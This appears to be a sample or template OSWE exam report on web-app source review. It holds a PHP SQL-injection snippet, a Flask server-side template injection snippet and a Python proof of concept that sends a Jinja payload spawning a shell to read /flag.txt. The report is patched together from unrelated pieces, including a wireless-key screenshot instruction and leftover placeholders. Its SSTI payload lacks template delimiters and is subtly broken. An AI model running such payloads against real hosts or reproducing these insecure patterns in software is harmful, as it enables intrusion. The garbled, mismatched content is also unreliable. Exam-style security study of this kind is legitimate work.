Compromised both app1 and app2 via source code review. Achieved remote code execution and extracted all flags.
For each target, provide the method and code used to identify and exploit the vulnerability.

Step-by-Step Walkthrough: OSWE exam report
// Vulnerable pattern: the id parameter is concatenated into the query unsanitized, so it is directly injectable.
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = " . $id;
Every successful "crack" must be documented with screenshots. These screenshots must clearly show the recovered wireless key and the "proof" file or flag requested by the exam instructions.

Upload the archive to the OffSec Exam Control Panel.

Essential Report Sections
# Vulnerable pattern: user input is written into the template source itself, so Jinja evaluates it (SSTI).
name = request.args.get('name')
return render_template_string(f"<h1>Hello {name}</h1>")

PoC:

import requests
payload = "''.__class__.__mro__[2].__subclasses__()[407]('cat /flag.txt', shell=True, stdout=-1).communicate()"
requests.get(f"http://target/profile?name={payload}")

Exploit script: exploit_ssti.py (attached)
Screenshot: Fig1 – command output showing flag

[Repeat for second vulnerability chain on other target]

Flags

- proof.txt on app1: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
- Screenshot of shell with id and cat proof.txt

Remediation

Use render_template() with user-controlled variables passed as context, never string concatenation with render_template_string().